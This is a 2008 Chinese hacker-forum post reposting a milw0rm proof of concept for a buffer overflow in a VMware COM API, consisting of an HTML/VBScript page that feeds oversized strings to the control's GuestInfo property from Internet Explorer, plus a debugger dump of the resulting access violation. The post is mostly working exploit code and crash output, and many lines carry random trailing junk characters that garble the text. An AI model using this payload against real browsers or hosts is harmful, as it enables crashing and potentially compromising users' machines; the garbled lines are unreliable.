学盟技术交流中心 » 技术文章 » VMware的COM API的缓冲区溢出
学盟技术论坛版主招聘 学生黑客联盟专版灰鸽子 Build 20080117 盟友每日签到处.增加贡献值! 学盟作品发布方式 点此投稿!
新人报道贴 赚取学盟金币! 学生黑客联盟远控黄金版 Build 20080118 学盟开启邀请码.送给你需要的朋友 滨哥和佳佳的blog!
本页主题: VMware的COM API的缓冲区溢出 打印 | 加为IE收藏 | 复制链接 | 收藏主题 | 上一主题 | 下一主题

鎏锦
心若一动,泪行千里。一笑间,云淡风轻。
特殊贡献奖
级别: 总版主


论坛精华: 2
疯狂发帖: 2229
学盟威望: 206 点
学盟金币: 7498 金
学盟贡献: 94 点
学盟好评: 76 分
学盟神石: 0 块
学盟社团: 狼势力社团
在线时间:1907(小时)
签名状态: 未签到-[209次/102天]
注册时间:2007-08-31
最后登录:2008-12-01
引用 推荐 编辑 购买 只看 复制

 VMware的COM API的缓冲区溢出

0
原文来自http://www.milw0rm.com/ :ws<-Qy  
]SEZaT  
测试环境Windows XP Professional SP3+所有补丁,Internet Explorer 7 下 .%-8 t{dt  
-------------------------------------------------- --------------------------- DlJo^|5  
<object classid='clsid:38DB77F9-058D-4955-98AA-4A9F3B6A5B06' id='test'></object> |7~<Is~ *  
"dlV k~  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> =_^X3z0  
{;oPLr+Z  
<script language='vbscript'> iy"*5<;*DD  
Sub tryMe 2an f$^[  
  buff_1 = String (2000, "a") ,,r>,Xq 6  
  buff_2 = String (2000, "b") FI.\%x  
  test.GuestInfo (buff_1) = buff_2 dr"1s-D4IQ  
End Sub VU#7%ufu&  
</script> 1;iUWU1@  
p<%d2@lp  
Dump: SrJE_~i  
09:25:39.339  pid=0640 tid=0504  EXCEPTION (first-chance) ,: ^u-b|  
              ---------------------------------------------------------------- |BYRe1l6l  
              Exception C0000005 (ACCESS_VIOLATION reading [00000070]) HKeK<V  
              ---------------------------------------------------------------- VaPG-n>Vf  
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? {G-kNU  
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 8EY:t zw  
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? P {'b:C  
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 2qp#N%  
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 =M-p/uB]  
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 Mihg:  
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 Ho%CDz z  
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 Ss`LLq0LO  
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 #;<Y[hR{P  
                            --> MOV EDX,[ECX+70] "5 A! jq  
              ---------------------------------------------------------------- uq{ beC  
liSmjsk  
09:25:39.339  pid=0640 tid=0504  EXCEPTION (unhandled) Uz7<PLxd  
              ---------------------------------------------------------------- *`U~?q}  
              Exception C0000005 (ACCESS_VIOLATION reading [00000070]) UI#h&j5pW  
              ---------------------------------------------------------------- ix$bRdl  
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? .u:GjL'$  
              EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 7L??ae  
              ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? SdWV3  
              EDX=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 "fI6Cpc  
              ESP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 TN.rrop`#g  
              EBP=0012BDE4: 00 BE 12 00 17 AC A5 02-00 00 00 00 00 00 00 00 Y} /-C3)  
              ESI=002F8010: 00 00 00 00 00 00 00 00-00 00 00 00 00 0E 27 07 ]q.0!lh+WL  
              EDI=0012CDB8: 62 62 62 62 62 62 62 62-62 62 62 62 62 62 62 62 Jv i#)  
              EIP=02A6CBBF: 8B 51 70 8B 02 5D C3 90-90 90 90 90 90 90 90 90 g :OI  
                            --> MOV EDX,[ECX+70] ?(PKeq6  
              ----------------------------------------------------------------
顶端 Posted: 2008-09-02 18:02 | [楼 主]
帖子浏览记录 版块浏览记录
学盟技术交流中心 » 技术文章

Total 0.049507(s) query 5, Time now is:12-02 09:50, Gzip enabled 黑ICP备05002849号
Powered by PHPWind v6.3.2 Certificate Code © 2003-07 PHPWind.com Corporation